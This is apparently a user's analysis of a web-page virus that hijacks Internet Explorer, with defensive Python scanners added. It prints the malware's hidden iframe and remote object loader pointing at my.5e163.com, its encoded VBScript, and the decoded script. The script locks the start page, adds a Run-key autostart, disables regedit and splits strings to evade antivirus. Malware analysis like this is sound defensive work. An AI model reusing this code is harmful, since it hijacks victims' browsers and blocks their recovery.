Today, while browsing the web, I unknowingly picked up a web-page virus. I had Rising antivirus running, and had updated it only yesterday,
yet it gave no warning at all that anything malicious had got in. After a good deal of poking around I finally understood how it works. My notes follow.
[Step 1]
First I used FlashGet to download the infected page and looked at its source. It contains this line:
<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
This line plainly says "do not display this inside the page", yet there it is in the page, which shows it is up to no good~~~~
[Step 2]
I then used FlashGet to download the http://my.5e163.com/ie.htm referenced above and looked at its source.
It has only four lines:
<html>
<object data="http://my.5e163.com/com88.test">
</object>
</html>
[Step 3]
Downloading http://my.5e163.com/com88.test in turn gives the following code:
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@&hd4R"+oqDbO+,JuJLJF/r[J`w?KJ[rWOhr[rl.+w\bJ'J1.Wr[EdK0J'ED-(xr'rYnMJLJxJLEY,2E[r62ELJVK.JLJ+Mw\lr[rkU-jOr[ElME[rY~KmJ[ELjsPr4DY2=zJ:Xc*qv2R^WsJ@#@&S/tc]+TDbOnPrCr[E|/ELJi-UGJLJWOSJ[ECM+wHbELJ^MWr[JkW6E[rYwq J'ED+Dr'J +JLEOPAJLJawE'rVGDr'JDw\mJ[Er -jYr'rl.r[rYPhlr'JT+E~,J4ODw)J&:HR*q&cmK:E@#@&Akt ILMkOn,JCE'r|/JLE`-jKJLJ0Dhr'JmDn-tkE'rmDKE[r/W6E'JD-&xE[EODE[rU+r[EO,2J'EXwE[rsKDELJD-tlr'Jbxw?J'EmDm4~nmJ[rLnJBPrtOY2lJzhXcX+8vf 1W:E~@#@&A/4 "+LqDbY+,J_E[r|/JLJiwUWJLE0DhJLECD-tkE[E^MWE[rdW6J'ED-qUELJO+MELJUJLJY,2r'JXwE[rVG.r[J.-tlJLErx'N0E[EC!VO{aE[rlLn|EDE'rVE~,E4YOa)Jz:HRlnF+& mK:E@#@&h/4 IoMrO+,J_J'JF/r[Ej'jWr[EWDhJ'EmDn-trr[E1DKJ[r/KWJLJO-&xE'rY+ME[rx+r'EY,2r[E62ELjsWME[r+.w:XwE'r+[j"Jk-;MJLJV8JBEtDY2)Jzhzc*+8&cmWsE@#@&S/4R]+L MkO+,ECr[EF;J[Ei'?GJLE6YAr[rlD-trJLJ^DKJ'EkW0r'JD-q E'JD+MJ'JUnr[EY,3JLJa2r[jsGMJ'J.'KzaJLJ+9j"E[rSd-!DE'rV rSJ4YYal&zsXc*nFfcmG:r@#@&S/4 "+o .bYnPrur[EnZr[J`-UGJLJWYSJ'EmD+'\kr[J1.GJLJkWWJ'ED-(xr'JD+.ELJxnELJOPAELJaaJLJVKDr'JDwKHJ'Ea+N`E[rISr'E/'Er[EDsfr~EtDOw=z&hHR*nq+& mKhr@#@&S/4RIoq.kD+~J_J'EnZJLEj'?Wr'E0Dhr[El.n'HrJLEmMWE'r/WWELJO-&Ur[ED+MJ[rxE[rY~2r[EaaJ[rsWMJ[rn.-tlr[EkUwwkE[r./DPuGr[Jhn,nCJLET+EBJ4YYa)J&:HRX+8vf 1W:r@#@&S/tc]noqDbYnPEur[E|;E[rjwjKJ[EWDhE[rCM+wtkr[J1DKE[r/G0r[EO'qxr'JD+Dr'ExJLJOP3ELJawr'J^W.ELJ+.wtlE[rr -obDr[JkY,uJLJG:r[En,nlr'JT+JBE4YDw=z&:z l+qv2 mK:E@#@&h/4 "+LMrD+~rCr[JnZr'J`-jWr[EWDhJLElM+-hGsk1k/wHrELJ^DKE[r/GWr[JOw&xE[rODELJ +JLJD~2r[E6aJ'E^WDr'JD-;GE[rxDDE[EG^PKlr'J +E'rV-uELJG:ELJKmJLJoJBEFr~EIAMm9qrIGE@#@&h/4 ]+TMkO+~E_J'Jn/JLJiwUWJ'E6YAJLEmDn'HbJ[rmMGJLJdW6J'ED-bE[rxNKE'js/'ZE[E;MDE[rnxD.nELJDdrr[EW w"J'rE -qAJLE(hSE[rr]3c2(AE~,JqApKS}IAR3(3~4YOw=&zsX XFvf 1WhJ@#@&S/4cIoMkDnPrCFJLJ/ELJj'jWr[J6OE[rhmJ'J.n'Hrmr'JMWE'r/WWELJO-qrr[E NKJ[rhkwZ!DE[rDnUr[JD#+r[JMdE[rkKxwnGsr[Ek1rJLJnd'?XE'r/E[rOJ'r:'fkkJLEl(VE[r+]nr[JTr/r[JD.E[rX:WGJ'E^/E~rqJBJ]3V{f 6"fE@#@&Akt "+TDbY~J_J'JnZE'rj-UGJLJ0DAE[rlM+wHrELJ^DKE[r/GWr[JOw&xE[rODELJ +JLJD~2r[E6aJ'E^WDr'JD-tCE[rk - 
kUELJ[WS~KbYE'rV+ES,JRO欢迎访问,hHRXF+&R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@</script>
<script LANGUAGE="VBscript.Encode">#@~^1gMAAA==@#@&WU,+MDWMPMn/!:nP +aO@#@&ZmsV,SW Lo+b{zN[sC-KDrYd`r【音乐影视】jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw+k|)N9sl7G.kD+k`E【上万首音乐】jsE4YOw=&zsX XFvf 1WhJ*@#@&@#@&Kx,+DMWM~D/;:PUnXY@#@&/l^VPdGUow+b{)N[9/VYK2`r音乐影视jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw+k|)N9f+kVOWa`r上万首音乐jsJ4ODwlzJhXc*nq+&R^GsJb@#@&@#@&WU,+MDWMPMn/!:nP +aO@#@&ZmsV,SW Lo+b{zN[p;r13Jl!Um4`E,娱乐明星网YJ~E4DY2)J&sX l+8v&cmKhJ*@#@&ZmVs~dWxTo+b{b9[}Ebm0SCEU^4`E$上万首音乐YE~rtOOa)z&hHRX+82R^K:r#@#@&@#@&oE mOkKx~JKxownk|bN9oC\KDbYn/cHBPi#@#@&dKx~nMDW.~M+dEsn,xnXY@#@&dU+D~?,'~hkt /M+lDn?4WDD^;Yvhkt ?2n1kCVwGV9+.dvjsC-KDrYdr#~3PrzJ,_,HP3J j"SEb@#@&dU KmDoOKlDt,'~j7@#@&djRUC\`b@#@&d?nO,?sP{~S/4cZM+lD+U4WMY^ED`Ad4R?anmblVwGsNDk`EsC-KDrYdJ*PQ~rz链接zE~3PHP3Ecj]dJ*@#@&i?^ KmDL+DnCO4P',i@#@&d?^ jl7+v#@#@&3U9PoE ^YbWU@#@&@#@&o; mOkKU,SG ow+k|b9[f/VYKwcHBPj*@#@&iWx,n.DKD,Dn/;hPU+XO@#@&djnDP?~x,hdtc/M+CD+UtWMY1;Yvhdtc?2n1kl^oW^N+MdcJzV^jd+.dG+d3DGwr#~Q,JzE~3PHP3Ecj]dJ*@#@&i?cPlMonYhlO4,'P`7@#@&d?cjC\`*@#@&2U[,s;x1OkKx@#@&@#@&rBEBAA==^#~@</script>
<script language="Jscript.Encode">#@~^TgAAAA==@#@&0; mDkW P1sWk+rYv#~`@#@&/OKb:+K;O`r/VWR^sK/n`*E~l#@#@&)@#@&^sK/nkDc*@#@&ARUAAA==^#~@</script>
</html>
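The three stages above (a zero-size iframe, an <object data=...> pulling a remote file, the WScript.Shell ActiveX object and script blocks marked *.Encode) are easy to flag mechanically. The scanner below is an added example written for this post, not code from the page; the HTML sample it feeds is constructed from the markup shown above with the encoded script bodies shortened.

```python
from html.parser import HTMLParser

# CLSID of the WScript.Shell ActiveX object the page instantiates as 'wsh'.
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"


class StagingScanner(HTMLParser):
    """Collects indicators of the hidden-loader pattern described in steps 1-3."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute names arrive lowercased
        if tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"):
            self.findings.append(f"hidden iframe -> {a.get('src', '?')}")
        if tag == "object":
            if "data" in a:
                self.findings.append(f"object loads remote data -> {a['data']}")
            if WSCRIPT_SHELL_CLSID in a.get("classid", "").upper():
                self.findings.append("WScript.Shell ActiveX instantiated (registry/shortcut access)")
        if tag == "script" and a.get("language", "").lower().endswith(".encode"):
            self.findings.append(f"encoded script block: {a['language']}")


def scan(html):
    """Return the list of indicator strings found in one HTML document."""
    s = StagingScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample stitching the three stages together (encoded bodies omitted).
SAMPLE = """<html><body>
<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
<object data="http://my.5e163.com/com88.test"></object>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@& ...encoded body omitted... ^#~@</script>
<script language="Jscript.Encode">#@~^TgAAAA==@#@& ...encoded body omitted... ^#~@</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```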
A jumble of garbage, but one keyword in it caught my eye: LANGUAGE="VBscript.Encode". So I followed that thread and searched the web for material on it.
It turns out Encode is used to encrypt scripts. I searched for quite a while without finding any decoding tool for it (there were plenty of encoders), and the only thing I found was an online decoder page at
http://www.china100.net/java1.htm
I pasted the jumbled code into that page's input box and it decoded successfully.
I then copied the decoded code into Notepad,
and got the following code:
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript">
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Se"&"arch Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\def"&"ault_p"&"age_ur"&"l", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edURLs\ur"&"l1","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edUR"&"Ls\ur"&"l2","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ty"&"pedU"&"RL"&"s\u"&"rl3","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fi"&"rst Ho"&"me Pa"&"ge","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fir"&"st H"&"om"&"e Pa"&"ge","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Policies\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Co"&"ntr"&"ol Pa"&"ne"&"l\H"&"ome"&"Pa"&"ge","1","REG_DWORD"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE http://my.5e163.com"
wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Win"&"dow Tit"&"le", "--欢迎访问 my.5e163.com--"
window.close
</script>
<script LANGUAGE="VBscript">
on error resume next
Call LongFei_AddFavorites("【音乐影视】","http://my.5e163.com")
Call LongFei_AddFavorites("【上万首音乐】","http://my.5e163.com")
on error resume next
Call LongFei_AddDesktop("音乐影视","http://my.5e163.com")
Call LongFei_AddDesktop("上万首音乐","http://my.5e163.com")
on error resume next
Call LongFei_AddQuickLaunch("[娱乐明星网]","http://my.5e163.com")
Call LongFei_AddQuickLaunch("[上万首音乐]","http://my.5e163.com")
Function LongFei_AddFavorites(N, U)
on error resume next
Set S = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") + "/" + N +".URL")
S.TargetPath = U
S.Save()
Set Sl = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") + "/链接/" + N +".URL")
Sl.TargetPath = U
Sl.Save()
End Function
Function LongFei_AddDesktop(N, U)
on error resume next
Set S = wsh.CreateShortcut(wsh.SpecialFolders("AllUsersDesktop") + "/" + N +".URL")
S.TargetPath = U
S.Save()
End Function
</script>
<script language="Jscript">
function closeit() {
setTimeout("self.close()",5)
}
closeit()
</script>
</html>
From the code above it is easy to see that it writes to the registry, and that it splits its strings into fragments to evade the antivirus signature scan.
To sum up, this web-page virus uses the usual virus tricks:
1. Hiding the page and leading deeper, and using <object data="http://my.5e163.com/com88.test"> and the like to disguise itself.
2. Encoding, which needs no explanation.
3. String splitting:
writing
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://my.5e163.com"
as
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
and so on, to get past the antivirus.
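The string-splitting trick in point 3 defeats a signature that looks for the literal key path, but it is trivial to undo once the script is decoded: every "ab"&"cd" seam is just a quote, an ampersand and a quote. The analyzer below is an added example written for this post (not the author's code); it reassembles each wsh.RegWrite call and labels the registry locations that the decoded script above actually touches, using three of its lines as a constructed sample.

```python
import re

# Constructed sample: three RegWrite lines from the decoded script, still in split-string form.
SAMPLE = r'''
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE http://my.5e163.com"
wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"
'''

# Registry locations written by the decoded script, and what each write does to the user.
SENSITIVE = [
    (r"internet explorer\\main\\(start page|search page|default_page_url|first home page|window title)",
     "IE start/search page hijack"),
    (r"internet explorer\\typedurls\\", "IE typed-URL history seeded"),
    (r"policies\\microsoft\\internet explorer\\control panel\\homepage", "home page locked via policy"),
    (r"currentversion\\run\\", "autostart (Run key) persistence"),
    (r"policies\\system\\disableregistrytools", "regedit disabled"),
]

REGWRITE = re.compile(r'RegWrite\s*"([^"]*)"\s*,\s*"([^"]*)"(?:\s*,\s*"([^"]*)")?', re.I)


def rejoin(line):
    """Undo the "ab"&"cd" fragmentation by deleting every quote-ampersand-quote seam."""
    return re.sub(r'"\s*&\s*"', "", line)


def classify(key):
    """Map a reassembled key path to a human-readable reason, or None if unremarkable."""
    for pattern, reason in SENSITIVE:
        if re.search(pattern, key, re.I):
            return reason
    return None


def analyze(script):
    """Return one record per RegWrite call: reassembled key, value, type and flag."""
    out = []
    for raw in script.splitlines():
        m = REGWRITE.search(rejoin(raw))
        if m:
            # WSH RegWrite defaults to REG_SZ when no type argument is given.
            key, value, vtype = m.group(1), m.group(2), m.group(3) or "REG_SZ"
            out.append({"key": key, "value": value, "type": vtype, "flag": classify(key)})
    return out


if __name__ == "__main__":
    for rec in analyze(SAMPLE):
        print(f"{rec['flag'] or 'unflagged':35} {rec['key']} = {rec['value']!r} ({rec['type']})")
```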